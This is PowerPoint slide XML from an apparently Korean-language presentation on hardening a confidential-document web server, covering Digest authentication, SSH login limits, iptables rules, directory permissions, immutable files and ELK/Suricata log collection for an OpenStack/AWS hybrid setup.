              <a:off x="1325323" y="1560056"/>
              <a:ext cx="3831031" cy="28148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sz="2000" b="1" kern="0" spc="-75">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>Before: Basic </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" kern="0" spc="-75">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>인증 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" kern="0" spc="-75">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1" kern="0" spc="-75">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>평문 노출 위험</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1" kern="0" spc="-75">
                  <a:solidFill>
                    <a:schemeClr val="lt1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="20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04360" y="1552073"/>
            <a:ext cx="4089226" cy="3087205"/>
            <a:chOff x="6904360" y="1552073"/>
            <a:chExt cx="4089226" cy="308720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t="52400" r="49090"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6977253" y="1925132"/>
              <a:ext cx="4016333" cy="2659548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904360" y="3931392"/>
              <a:ext cx="40233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0"/>
                <a:t>✅ </a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Text 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7289359" y="1552073"/>
              <a:ext cx="3392119" cy="28148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sz="2000" b="1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After: Digest </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1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인증 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1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(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="2000" b="1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암호화 전송</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1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)</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="2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49577" y="4767831"/>
            <a:ext cx="8499768" cy="1863857"/>
            <a:chOff x="1849577" y="4767831"/>
            <a:chExt cx="8499768" cy="1863857"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="Shape 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1849577" y="4767831"/>
              <a:ext cx="8499768" cy="1863857"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="7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68" name="Image 1" descr="preencoded.png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2079041" y="4920297"/>
              <a:ext cx="334975" cy="334975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Text 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2594711" y="4987365"/>
              <a:ext cx="7134505" cy="359347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b="1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보안 취약점</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1500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Basic </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1500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인증 시 네트워크 스니핑을 통해 사용자 암호가 실시간 탈취 가능함</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="150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0" name="Image 1" descr="preencoded.png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2079041" y="5536750"/>
              <a:ext cx="334975" cy="334975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Text 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2594711" y="5603818"/>
              <a:ext cx="7134505" cy="359347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b="1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대응 방안</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1500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HTTP Digest </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1500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인증을 도입하여 서버와 클라이언트 간의 자격 증명을 해시 화함</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="150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" name="Image 1" descr="preencoded.png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2079041" y="6149446"/>
              <a:ext cx="334975" cy="334975"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="73" name="Text 3"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2594711" y="6216514"/>
              <a:ext cx="7134505" cy="359347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500" b="1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결과</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1500" b="1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: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1500" kern="0" spc="-75">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>패킷 가로채기 공격으로부터 사용자 비밀번호 및 비인가 디렉토리 접근 권한을 완벽히 보호함</a:t>
              </a:r>
              <a:endParaRPr kumimoji="0" lang="en-US" sz="150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964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/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="194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1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="1242186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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381304" y="952805"/>
            <a:ext cx="4673295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임계치 기반 보안 설정을 통한 시스템 침입 원천 차단</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="13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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381303" y="390449"/>
            <a:ext cx="9427328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기밀 문서 서버 웹 보안 설정</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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브루트포스 공격 대응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45877" y="1380802"/>
            <a:ext cx="4448810" cy="2086298"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="화살표: 오른쪽 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5109404" y="2211510"/>
            <a:ext cx="933476" cy="583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highlight>
                <a:srgbClr val="000000"/>
              </a:highlight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32931" y="3501195"/>
            <a:ext cx="9761756" cy="1958515"/>
            <a:chOff x="1239982" y="4156351"/>
            <a:chExt cx="10210800" cy="2436016"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Shape 4"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1239982" y="4156351"/>
              <a:ext cx="10210800" cy="2436016"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 3260"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="6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Shape 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1239982" y="4156351"/>
              <a:ext cx="72222" cy="2436016"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FBBF24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51" name="Image 0" descr="preencoded.png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540147" y="4360267"/>
              <a:ext cx="357670" cy="462226"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="52" name="Image 1" descr="preencoded.png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549139" y="5030247"/>
              <a:ext cx="251056" cy="324446"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Text 7"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2037130" y="5088208"/>
              <a:ext cx="8491227" cy="286151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200" b="1">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>MaxAuthTries: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>로그인 시도를 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>회로 제한하여 무차별 대입 공격의 효율을 급격히 떨어뜨립니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="54" name="Image 2" descr="preencoded.png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545907" y="5597362"/>
              <a:ext cx="251056" cy="324446"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="Text 8"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2037130" y="5645647"/>
              <a:ext cx="8460279" cy="286151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200" b="1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PermitRootLogin no: </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="12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최고 관리자</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="12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(root) </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="12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계정의 직접 로그인을 차단하여 공격 대상을 줄입니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="120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.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="56" name="Image 3" descr="preencoded.png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551894" y="6139500"/>
              <a:ext cx="251056" cy="324446"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57" name="Text 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2030895" y="6205060"/>
              <a:ext cx="8921123" cy="286151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1200" b="1" dirty="0" err="1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LogingraceTime</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" b="1" dirty="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2m:</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" b="1" dirty="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 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1200" dirty="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로그인 대기 시간을 제한하여 세션 점유를 방지합니다</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="CBD5E1"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>.</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Text 17"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2125760" y="4448945"/>
              <a:ext cx="2673930" cy="32471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500" b="1">
                  <a:solidFill>
                    <a:srgbClr val="E2E8F0"/>
                  </a:solidFill>
                  <a:latin typeface="Noto Sans KR"/>
                  <a:ea typeface="Noto Sans KR"/>
                  <a:cs typeface="Noto Sans KR"/>
                </a:rPr>
                <a:t>핵심 보안 설정 및 기대효과</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="150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32931" y="1368753"/>
            <a:ext cx="3891072" cy="2098347"/>
            <a:chOff x="1239982" y="1610883"/>
            <a:chExt cx="3891072" cy="209834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9982" y="1763694"/>
              <a:ext cx="3891072" cy="194553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239982" y="2502408"/>
              <a:ext cx="657835" cy="40407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1897817" y="1610883"/>
              <a:ext cx="995402" cy="90371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1897817" y="2807194"/>
              <a:ext cx="995402" cy="11127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2893219" y="1610885"/>
              <a:ext cx="2047080" cy="119634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rcRect t="4918" r="6830"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2615638" y="1405783"/>
            <a:ext cx="1988140" cy="113196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7"/>
          <a:srcRect b="54270"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="932931" y="5879752"/>
            <a:ext cx="7067438" cy="658309"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="Text 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8460756" y="6095253"/>
            <a:ext cx="2387353" cy="26824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같은 대역에서의 </a:t>
            </a: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SSH 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접속 차단</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Image 1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05652" y="6089339"/>
            <a:ext cx="178905" cy="178905"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="Text 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="932931" y="5553981"/>
            <a:ext cx="4033630" cy="33375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Iptables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="18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814064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r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>서</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="11628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55174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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="361290" y="399592"/>
            <a:ext cx="11075010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800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-75" normalizeH="0" baseline="0" dirty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기밀 문서 서버 웹 보안 설정</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-75" normalizeH="0" baseline="0" dirty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:</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="2800" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="-75" normalizeH="0" baseline="0" dirty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웹 서버 디렉토리 권한 최적화 및 무결성 보호</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="3106665"/>
            <a:ext cx="9713313" cy="946448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4" name="Text 34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520776" y="3194485"/>
            <a:ext cx="9514062" cy="75214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171450" marR="0" lvl="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 </a:t>
            </a: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접근 제한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:</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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apache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 </a:t>
            </a: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그룹에 속하지 않은 일반 사용자는 이 폴더에 접근하거나 내용을 볼 수 없음</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="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 쓰기 금지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:</a:t>
            </a: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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR" sz="1500" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" dirty="0" err="1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apache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 </a:t>
            </a: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그룹에게는 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‘</a:t>
            </a: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읽기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’</a:t>
            </a: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와 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‘</a:t>
            </a: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실행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’</a:t>
            </a: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권한만 부여하여</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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,</a:t>
            </a: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 웹 서비스 취약점을 통해 파일이 변조되거나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                        악성 스크립트가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업로되는</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US" sz="1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 것을 방지</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Shape 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381305" y="4803916"/>
            <a:ext cx="9713313" cy="1636768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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520776" y="4910862"/>
            <a:ext cx="8043940" cy="12647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171450" marR="0" lvl="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삭제 및 수정 절대 방지</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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root </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="ko-KR" altLang="en-US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사용자라 할지라도 해당 속성을 해제하기 전까지는 파일 삭제</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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 수정</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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 이름 변경 불가</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="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침입 후속 조치 차단</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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 해커가 서버 권한을 획득하더라도</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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 기밀 문서를 훼손하거나 내용 변경 봉쇄</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" marR="0" lvl="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랜섬웨어 방어</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="ko-KR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 파일 변조가 불가능하므로 랜섬웨어 공격으로부터 데이터를 보호하는 강력한 방어선 역할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26730" b="26876"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393234" y="1396092"/>
            <a:ext cx="9701384" cy="163676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1760" t="14720" r="6890" b="17060"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="393234" y="4173625"/>
            <a:ext cx="6617914" cy="5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OpenStack 온프레미스 &amp; AWS 하이브리드 아키텍처 개요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l="-837" r="-837"/>
          <a:stretch/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381305" y="390449"/>
            <a:ext cx="3210458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 kern="0" spc="-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네트워크 구조</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp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Infrastructure Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000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85DD231-473B-11BA-E7B0-97236797C08D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="371246" y="1537106"/>
            <a:ext cx="11405929" cy="4949647"/>
            <a:chOff x="371246" y="1537106"/>
            <a:chExt cx="7582205" cy="4949647"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8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8" name="그림 47" descr="텍스트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A81D13-0CED-18A0-0056-D521488C2D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33" r="4996" b="2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="428580" y="1577942"/>
            <a:ext cx="11289075" cy="48649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571500" y="838505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시스템, 애플리케이션 및 보안 이벤트 로그 통합 수집 전략</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1300"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Shape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1094771"/>
            <a:ext cx="571500" cy="3840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571500" y="5567712"/>
            <a:ext cx="5372100" cy="1050630"/>
            <a:chOff x="6248095" y="5411631"/>
            <a:chExt cx="5372100" cy="1162202"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="Shape 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6248095" y="5411631"/>
              <a:ext cx="5372100" cy="1162202"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 5159"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1E293B">
                <a:alpha val="60000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:ln w="12700">
              <a:solidFill>
                <a:srgbClr val="94A3B8">
                  <a:alpha val="1000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46" name="Image 9" descr="preencoded.png"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId3"/>
            <a:srcRect l="-3420" r="-3420"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6448349" y="5640231"/>
              <a:ext cx="142646" cy="133502"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="47" name="Text 35"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6667805" y="5610970"/>
              <a:ext cx="2653589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000" b="1" kern="0" spc="52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핵심 고려사항 (KEY CONSIDERATIONS)</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="48" name="Image 10" descr="preencoded.png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448349" y="5916380"/>
              <a:ext cx="114300" cy="114300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="Text 36"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6638544" y="5877975"/>
              <a:ext cx="2253082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0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로그 발생 시점 일치</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="Text 37"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6638544" y="6068170"/>
              <a:ext cx="2238451" cy="152705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9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Suricata</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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에서 탐지된 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="9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drop </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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이벤트와 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="9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ELK</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="9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에 적재되는 타임스팸프를 일치시켜 공격의 골든타임 내 즉각 대응 체계 구축</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="900"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="Image 11" descr="preencoded.png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010498" y="5916380"/>
              <a:ext cx="114300" cy="114300"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="Text 38"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9201607" y="5877975"/>
              <a:ext cx="2319833" cy="1911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0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위협 가시성 통합</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1000"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="Text 39"/>
            <p:cNvSpPr txBox="1"/>
